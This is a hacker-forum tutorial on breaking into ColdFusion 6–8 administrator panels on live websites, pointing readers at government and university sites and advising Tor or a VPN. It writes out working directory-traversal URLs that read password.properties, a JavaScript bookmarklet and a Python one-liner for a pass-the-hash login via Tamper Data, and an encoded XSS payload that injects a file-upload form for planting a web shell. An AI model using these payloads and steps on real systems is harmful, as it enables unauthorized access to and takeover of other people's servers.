[GOONS] COLDFUSION HACKING TUTORIAL

[The High Roller]

 

Cold Fusion Hacking Tutorial

 

 

Introduction

 

"ColdFusion is the name of a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications." - Wikipedia

 

ColdFusion is also extremely secure. Because of this, a lot of government websites use it, and so do many universities. Finding vulnerable websites takes a lot of time and patience. The only vulnerable version are 6,7, and 8.

 

Requirements/Needed materials

 

You will need:

 

 

[*]A VPN or Tor

[*]A Javascript Script that will be given later on

[*]Tamper Data

[*]Patience

 

 

 

 

Finding Vulnerable websites

 

Finding vulnerable websites takes a while. The most simple way to find them is using a google dork: ext:cfm. cfm is the file extension used by ColdFusion. In this tutorial, I will be using www.site.com as our website.

 

Testing if the website is vulnerable

 

Firstly get on a VPN or Tor. Now this part is a bit tricky because their are 2 parts. The 1st part is adding this to the end of your website: /CFIDE/administrator/. So it will be www.site.com/CFIDE/administrator/. /CFIDE/administrator/ is the location of the admin panel, which is what we're exploiting. If all goes according to plan, you should come across an admin panel that also will say the version of ColdFusion it's using. If it's under 6 or above 8, find a different website. The 2nd part is, if the version was 6-8, add (after /CFIDE/administrator/) :

 

• 
   
  
• Version 6: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
   
  
• Version 7: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en?
   
  
• Version 8: enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e?n
   
  

 

If something like:

 

#Sat Feb 02 09:38:26 CET 2008 rdspassword= password=D132F5908A92640541ED7E8F44679D6C0E644D9A encrypted=true

 

Shows up, it means the website is vulnerable. Now copy whatever is after password= until encrypter.

 

 

Exploiting the vulnerability

 

Now, add this script as a bookmark: javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))

 

Then open Tamper Data. Go back to the website and paste the hashed password into the password bar, then click the javascript bookmark, then a window will pop up with another password, copy that. Go to tamper data and click start tampering. Go back to the website and click the login button. Tamper Data will alert you whether you want to tamper the data or cancel. Click the checkbox that says "Keep tampering" so that it stops tampering. Then click tamper. In the top right corner there will be a textbox that displays the hashed password. Replace that with the password that popped up in the box, and click ok. You should then, if done correctly, be in the CF panel.

 

Extra things

 

"There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm

 

To do to this add this to your URL:

 

[url=http://www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined]www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined[/url](​%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D​%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%​22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C​%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%​20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E

 

It exploits a zero day XSS attack in probe.cfm

 

Also if the j

jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPas​s​word.value))

doesn't work you can also use a python one-liner.

 

Here it is:

python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'

 

To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as Cyber said, do that with Tamper Data." -  INST1NCT

 

 

:D I hope you enjoyed the tutorial!